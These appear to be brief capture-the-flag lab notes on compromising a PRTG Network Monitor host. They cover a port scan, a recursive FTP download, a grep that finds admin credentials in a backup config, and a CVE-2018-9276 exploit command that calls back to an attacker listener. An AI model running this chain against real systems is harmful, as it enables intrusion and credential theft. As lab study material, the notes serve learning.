Rustscan
Open 10.129.210.193:21
Open 10.129.210.193:80
Open 10.129.210.193:135
Open 10.129.210.193:139
Open 10.129.210.193:445
Open 10.129.210.193:5985
nmap
FTP
Web
/ProgramData/Paessler
wget -r ftp://10.129.210.193/ProgramData/Paessler
grep password */* | less
PRTG Configuration.dat
很可疑PRTG Configuration.old.bak
PRTG Configuration.dat
PRTG Configuration.old
Configuration Auto-Backups/*
PRTG Configuration.old.bak
應該最可疑
prtgadmin
PrTg@dmin2018
2019
prtgadmin
PrTg@dmin2019
python CVE-2018-9276.py -i 10.129.210.202 -p 80 --lhost 10.10.16.35 --lport 7877 --user prtgadmin --password PrTg@dmin2019